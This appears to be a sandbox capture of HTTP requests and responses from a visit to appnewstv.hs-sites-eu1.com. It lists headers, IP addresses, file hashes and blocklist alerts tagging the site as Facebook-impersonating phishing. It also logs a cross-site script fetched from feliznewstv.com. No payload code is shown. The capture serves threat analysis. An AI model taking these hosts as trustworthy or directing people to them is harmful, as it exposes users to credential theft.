content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (64286), with no line terminators
Size:   49633
Md5:    9808b118269fbc08320e2057bc16b503
Sha1:   edb89d14c8684686fd408c3501b74da7b1332d63
Sha256: c0c408c05aadc83b8757d81cd2892cb35277eeaf9649eda5241279b2fedc8c21
                                        
GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=931822577&v=1.1&a=26246913&pi=53071520739&ct=standard-page&ccu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com&cpi=53071520739&lpi=53071520739&lvi=53071520739&pu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com%2F&t=app+news+tv&cts=1663196136124&vi=a7312f7f5841285b0adc6f5d12aa1228&nc=true&u=205882892.a7312f7f5841285b0adc6f5d12aa1228.1663196136122.1663196136122.1663196136122.1&b=205882892.1.1663196136122&cc=15 HTTP/1.1
Host: track-eu1.hubspot.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
172.65.240.166
HTTP/2 200 OK
content-type: image/gif
date: Wed, 14 Sep 2022 22:55:50 GMT
content-length: 45
cf-ray: 74acb66588e495f1-ARN
accept-ranges: bytes
cache-control: no-cache, no-store, no-transform
last-modified: Wed, 14 Sep 2022 22:55:50 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
cf-cache-status: MISS
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-hubspot-correlation-id: bf469c19-4697-4016-ab11-35425c8651c9
x-robots-tag: none
set-cookie: __cf_bm=Yjzf25f5pE4ogN7c6HN78J.SLqOUaN6BoyT9ngCG93U-1663196150-0-Aa0UrBKiwhd3C3qILNlIMljhEbDdPKhZ5fffJWS7RayM/NGY7bachLOEg0D22yhZ8W5po8bnelP0Oan1b2W/Im8=; path=/; expires=Wed, 14-Sep-22 23:25:50 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JqgOXdw%2BmlNJENcufVTskKnQ2hwuIUY3wLAMQrcwY3HxShsHjHbfEIWHu9VtKtZtxDnORHvAq1v7gGBVWMmrGg1DKXbU7Px9hdxze1TZWopzO83dm8PzzhaMv50gS5O1jU5BP5LE4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   45
Md5:    c8817d472077ebfc04593c1fa019d32d
Sha1:   e1e86f41c86c7b9cd2e8b76c6a925a1a3e7e3247
Sha256: dc111a70984a9eda00752b06277113029ef288f1125c31eff2477413e15e8aa4
                                        
GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1
Host: forms-eu1.hsforms.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
172.65.232.43
HTTP/2 200 OK
content-type: image/gif
date: Wed, 14 Sep 2022 22:55:50 GMT
content-length: 35
x-trace: 2B04ECF2CAC5084B2406877B8DC58C5ACD1C7538B5000000000000000000
cache-control: max-age=0, no-cache, no-store
vary: Accept-Encoding
x-hubspot-correlation-id: 50476885-8044-4611-84bb-1d146c6e07b8
access-control-allow-credentials: false
access-control-expose-headers: X-Origin-Hublet
x-robots-tag: none
cf-cache-status: DYNAMIC
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74acb6660f5895f6-ARN
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   35
Md5:    c2196de8ba412c60c22ab491af7b1409
Sha1:   5fbd472222feb8a22cf5b8aa5dc5b8e13af88e2b
Sha256: 6adc3d4c1056996e4e8b765a62604c78b1f867cceb3b15d0b9bedb7c4857f992
                                        
GET /location/ HTTP/1.1
Host: feliznewstv.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://appnewstv.hs-sites-eu1.com/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
147.182.144.225
HTTP/1.1 200 OK
Content-Type: application/javascript
Server: nginx
Date: Wed, 14 Sep 2022 22:55:50 GMT
Content-Length: 468
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   468
Md5:    6f1497d5364a6cfda0e81dd10d409ebf
Sha1:   4db66111b55d4b33203ba3a888e12ba6163cdfdf
Sha256: 3cf8f3dd6ae89d4970edad8007c999d712327c53c1da0998db6f32c7ad99c4e2
                                        
                                            GET /widget/josvip222 HTTP/1.1 
Host: whos.amung.us
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.22.74.171
HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=UTF-8
                                        
Date: Wed, 14 Sep 2022 22:55:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
cache-control: no-cache, no-store, must-revalidate
location: http://widgets.amung.us/classic/00/8.png
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 74acb6670b9cf14e-ARN

                                        
                                            GET /classic/00/8.png HTTP/1.1 
Host: widgets.amung.us
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://appnewstv.hs-sites-eu1.com/
Connection: keep-alive

                                         
                                         104.22.75.171
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Wed, 14 Sep 2022 22:55:51 GMT
Content-Length: 1431
Connection: keep-alive
last-modified: Sun, 13 Jun 2010 09:03:09 GMT
etag: "4c149ecd-597"
expires: Mon, 12 Sep 2022 13:29:34 GMT
cache-control: max-age=2678400
access-control-allow-origin: *
CF-Cache-Status: HIT
Age: 293177
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 74acb667fec595e2-ARN


--- Additional Info ---
Magic:  PNG image data, 81 x 29, 8-bit colormap, non-interlaced\012- data
Size:   1431
Md5:    3664423d2ad0a1545fa63d62a8551393
Sha1:   4d05ca47d92aebd285ee79d7433f984e8d6ec2fb
Sha256: c1dc2cc26ca102520d01cf8e6e5404659d58f92c6c344b983a9cd68a983e5b72
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "A4F07D30F29E785E2EE605AEE590AB928C3E1412F4DC61FF163CF32445CC3AF4"
Last-Modified: Tue, 13 Sep 2022 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5780
Expires: Thu, 15 Sep 2022 00:32:11 GMT
Date: Wed, 14 Sep 2022 22:55:51 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb3545c74-7af3-4ad8-815b-6a50681a2362.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 10633
x-amzn-requestid: 2a8ec7f2-8704-440e-9966-ae4643d6aa5c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YdyhcF6RIAMFTEg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6322313c-4d1bfab72580e62231978193;Sampled=0
x-amzn-remapped-date: Wed, 14 Sep 2022 19:53:32 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: Dr0K5GobFSc2ooWzPsbe6tfoTbF_NglaVuT8z-cM-B0AufMh_PohhQ==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 2ab6211e66998c8b58132661a7e3cade.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 20:21:13 GMT
age: 9278
etag: "13d42d455f5131b7b861b97eb3f0e91236d4d222"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10633
Md5:    f42b72c3fd66a6758ebcf0ca8cc1a046
Sha1:   13d42d455f5131b7b861b97eb3f0e91236d4d222
Sha256: 4a07fcacde77dc890164fda9f295b61af6947b2d7f3f84f64749d93e3a1e5b99
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F2d547c90-3ccc-4c25-a8e5-de1d932a8cfb.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 3951
x-amzn-requestid: 65c15365-1bff-4dd2-a651-33683a033e05
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YE9_oHP_oAMF3Fw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63184397-148253910e5cd21b0e436b09;Sampled=0
x-amzn-remapped-date: Wed, 07 Sep 2022 07:09:11 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: wzHSKob2n4WsbIoi6eJdCptVrefJxBEVANMp-WZSm6HsOI7bPUwaDA==
via: 1.1 4dde8ec6d6c12741888c2d3a059d4a2e.cloudfront.net (CloudFront), 1.1 32d624dbeb2a8b7f24dbe49007e37c90.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 22:19:28 GMT
age: 2183
etag: "cab4d850cd2bc5b3e1570ae837a58382e6eae5ec"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   3951
Md5:    aaf675adec05212317877a5f479d11a7
Sha1:   cab4d850cd2bc5b3e1570ae837a58382e6eae5ec
Sha256: cb4eb5b406f1ec01e3094d0519d8e4e7a469056bb898e2c47d48378e4b2b261d
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1e20bf1d-c24c-4dc0-9796-f2f870591ff2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6484
x-amzn-requestid: cefd7270-c8ca-4ced-b9bd-52353fbefa5a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YBIIUHOZIAMF9wQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6316ba35-7d4c4c53090c83ea3fadbf4e;Sampled=0
x-amzn-remapped-date: Tue, 06 Sep 2022 03:10:45 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: V0CJvbFSNJT2eHVOeCkdZNStr6eZg3EO0YTNyTUsmiirYMm9gfzBKg==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 567b44ed19c8caed2570b7bcd8c70034.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 21:42:19 GMT
age: 4412
etag: "098d000aebd7ba0637fe420b9dfdacd2146af240"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6484
Md5:    cb7c9c7f4257ab79526157f3ba507d6e
Sha1:   098d000aebd7ba0637fe420b9dfdacd2146af240
Sha256: 74fd95bcffcaf6919e8bca4184978340bef089528f9d184e7d88e1fd4c83288b
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fcede4553-e9f1-4ab1-9d0e-2f0bfae52d09.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8010
x-amzn-requestid: 498e0a9a-7fd6-4a08-9111-91020cbebdf0
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YeB59FiWIAMFX9g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632249d9-737b49125f659cb64d1de09a;Sampled=0
x-amzn-remapped-date: Wed, 14 Sep 2022 21:38:33 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: ByjIeUOe8ws46kVoLkd08LpLIdiWkKJoIFxeXTGaHYB863tOGGlBuQ==
via: 1.1 efe54e8b68e074d39b2ecd249f85100a.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 21:39:22 GMT
age: 4589
etag: "6c1ed76ca3c29af41ef4031eaea6b9040465517b"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8010
Md5:    5a76383eca28732b4f7847139f12a5cb
Sha1:   6c1ed76ca3c29af41ef4031eaea6b9040465517b
Sha256: 5d205ffc5a3177111f640f270fd0204eef790e531f69299d3de075f9387df966
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fafb10f81-8409-401c-bd62-3ec01954600c.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6770
x-amzn-requestid: b7c9513c-b8ba-41c7-9f9a-0a9d2266172d
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X7FlpEVRIAMFygA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63144fbd-7a4408363cdc46c9355a9f47;Sampled=0
x-amzn-remapped-date: Sun, 04 Sep 2022 07:11:57 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: fqj5PljprRruE1jwYAVwKoHkjys-RakUjzuV67_Ued6T4et99JPxPg==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 02d90bf99fd6253b329a53c82f19e224.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 21:42:04 GMT
age: 4427
etag: "f6b742549ea35a4b1345cffb937a8bbcceee08ef"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6770
Md5:    2e5f57ba37fac4e6047a9a321a8ec084
Sha1:   f6b742549ea35a4b1345cffb937a8bbcceee08ef
Sha256: f8c67c54806e47089b9ba297599e3e4cde1fd2e2e38b76acc9e8de0e99d7b77e
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1266c973-1bdd-4969-82ca-1106689fe929.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5078
x-amzn-requestid: b6177371-a8ba-4541-a48d-21bd806e866e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X0erUHT-IAMFWKg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6311ab15-157ed5b700e0aad5481f5c0f;Sampled=0
x-amzn-remapped-date: Fri, 02 Sep 2022 07:04:53 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: Vlo8vCUrKDtvhAGHSYKMmPk-wVNgx9OlU3ZVrpgG0tgk8ZBllAtXNQ==
via: 1.1 9b311162717b41c968f6f00426d88aaa.cloudfront.net (CloudFront), 1.1 68fadeb91f97256bb67b03bfca74d830.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 20:21:58 GMT
age: 9233
etag: "af100925cba1be716fd2200715d6136bd7f0c5bc"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5078
Md5:    f50c34bc30a732593e8fe465055a44ff
Sha1:   af100925cba1be716fd2200715d6136bd7f0c5bc
Sha256: 703049736ccc8815945d69634059c4cd39533417e0969107d460c36a6787c761
                                        
                                            POST /_hcms/perf HTTP/1.1 
Host: appnewstv.hs-sites-eu1.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/json
Content-Length: 739
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Cookie: __hstc=205882892.a7312f7f5841285b0adc6f5d12aa1228.1663196136122.1663196136122.1663196136122.1; hubspotutk=a7312f7f5841285b0adc6f5d12aa1228; __hssrc=1; __hssc=205882892.1.1663196136122

                                         
                                         104.18.33.253
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
                                        
Date: Wed, 14 Sep 2022 22:55:53 GMT
Content-Length: 2
Connection: keep-alive
CF-Ray: 74acb677fc090b69-OSL
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Credentials: false
X-HubSpot-Correlation-Id: 84c6a58f-f491-406e-b85b-3bb6bc8e5b11
X-Robots-Tag: none
X-Trace: 2B7495CA25361B8C818AB9AC6FE27935BA3F5E72EB000000000000000000
Server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   2
Md5:    e0aa021e21dddbd6d8cecec71e9cf564
Sha1:   9ce3bd4224c8c1780db56b4125ecf3f24bf748b7
Sha256: 565339bc4d33d72817b583024112eb7f5cdf3e5eef0252d6ec1b9c9a94e12bb3

Alerts:
  Blocklists:
    - openphish: Facebook, Inc.
    - fortinet: Phishing
                                        
                                            GET /26246913.js HTTP/1.1 
Host: js-eu1.hs-banner.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.202.201
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
x-amz-id-2: eMvK/+B+42bBRulR0IJXLilgHC+cniLzaOvjYRJ/vPUvuhfzQdr5DZbhrA9aZpZloYv8hRCJ5Mc=
x-amz-request-id: TZJG9K9055D38NE7
last-modified: Tue, 13 Sep 2022 13:50:52 GMT
etag: W/"32ad209e131aa4d3350f4e63295ad005"
x-amz-server-side-encryption: AES256
cache-control: max-age=300, public
x-amz-version-id: UBvwYk_We_pJ5IIipKbbbJNIhGE5mW1n
access-control-allow-origin: https://appnewstv.hs-sites-eu1.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
expires: Wed, 14 Sep 2022 23:00:49 GMT
cf-cache-status: REVALIDATED
vary: Accept-Encoding
server: cloudflare
cf-ray: 74acb6608e8c0d42-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /HubspotToolsMenu/static-1.138/js/index.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.5.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
x-amz-replication-status: COMPLETED
last-modified: Wed, 27 Jul 2022 14:35:54 GMT
etag: W/"0d86ec7be24f2dff2308b8edf54c2f32"
x-amz-server-side-encryption: AES256
x-amz-version-id: k79.hN9WG526nViFF800Vr3DxQF_q.yo
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 2f7792bdc67f7953e2dce93aea1bb9ee.cloudfront.net (CloudFront)
x-amz-cf-pop: ARN54-C1
x-amz-cf-id: YLTjijGIrvYs-mnf4m802qhKaeCMPTJPO9kWnGo7DPUFSWw4moWKag==
cf-cache-status: HIT
age: 1754106
expires: Thu, 14 Sep 2023 22:55:49 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WeVhhj045tWgGynX5a84rsHdB0woJo7cUsyKTVHlV7tVy5T3FR3oeLW49F6kXAFF9dF9i0xwMBGHl6cjrn7LK7igfISeuUTPi%2FKsyHAJ335p3mFvhd%2F%2FwHO9MRPX%2BhcHNlRpG9J56Ps%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74acb65dccbab50b-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /css?family=Roboto:regular,700&display=swap HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Wed, 14 Sep 2022 22:55:49 GMT
date: Wed, 14 Sep 2022 22:55:49 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
